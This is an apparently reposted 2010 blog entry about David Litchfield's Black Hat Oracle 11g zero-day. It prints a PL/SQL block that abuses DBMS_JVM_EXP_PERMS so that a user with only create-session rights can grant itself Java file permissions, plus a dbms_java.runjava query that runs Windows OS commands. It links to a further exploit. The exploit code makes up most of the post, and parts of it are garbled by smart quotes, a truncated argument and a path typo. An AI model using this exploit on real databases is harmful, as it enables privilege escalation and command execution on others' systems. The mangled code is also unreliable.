Thursday, February 11, 2010

Hacking Oracle 11g

David Litchfield’s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:

Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’< FILES>>‘,’execute’,'ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/


Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).

However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\syste\\cmd.exe
/c dir>c:\\out.lst’)from dual;


To download video about this presentattion, here.

Some of them said Blackhat has removed this video, but i can download it last week.
http://blog.red-database-security.com/2010/02/05/oracle-blackhat-video-removed-from-website/


Article from :http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/

Here are links that related to Hacking Oracle 11g:
http://www.favsky.com/computer/news/itworld/black-hat-zero-day-hack-of-oracle-11g-database-revealed.html

No comments: